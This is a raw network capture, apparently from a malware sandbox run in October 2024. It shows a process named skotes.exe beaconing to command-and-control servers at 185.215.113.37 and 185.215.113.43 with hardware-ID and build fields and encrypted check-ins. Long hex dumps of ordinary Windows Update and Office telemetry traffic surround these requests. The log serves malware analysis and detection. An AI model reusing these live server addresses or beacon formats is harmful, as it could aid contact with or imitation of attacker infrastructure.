                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Oct 7, 2024 03:23:59.081957102 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Content-Length: 211
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a
                                                                                                                                      Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"doma------GIDBKKKKKFBGDGDHIDBG--
                                                                                                                                      Oct 7, 2024 03:23:59.307483912 CEST210INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:59 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 8
                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                      Data Ascii: YmxvY2s=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.461185185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:59.694327116 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:24:00.397636890 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:24:00 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.461186185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:24:02.008500099 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:24:02.726773977 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:24:02 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.461187185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:24:04.242413044 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:24:05.063016891 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:24:04 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.461188185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:24:06.729348898 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:24:07.450479031 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:24:07 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.44973020.109.210.53443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-10-07 01:22:19 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                      MS-CorrelationId: 5e67fac3-e4c8-4af9-af49-b77bdce863bd
                                                                                                                                      MS-RequestId: 501d0857-0548-436e-a685-a173bc8ca63a
                                                                                                                                      MS-CV: x4Reh1yWjUO7m1pB.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:19 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 24490
                                                                                                                                      2024-10-07 01:22:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                      2024-10-07 01:22:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      1192.168.2.44973613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:57 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:57 UTC540INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:57 GMT
                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Content-Length: 218853
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public
                                                                                                                                      Last-Modified: Fri, 04 Oct 2024 23:21:50 GMT
                                                                                                                                      ETag: "0x8DCE4CB535A72FA"
                                                                                                                                      x-ms-request-id: 4dad204e-401e-005b-4bf5-169c0c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012257Z-1657d5bbd48wd55zet5pcra0cg00000002qg00000000m391
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:57 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                      Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                      Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                      Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                      Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                      Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                      Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                      Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                      2024-10-07 01:22:57 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                      Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.44973720.109.210.53443
                                                                                                                                      TimestampBytes transferredDirectionData
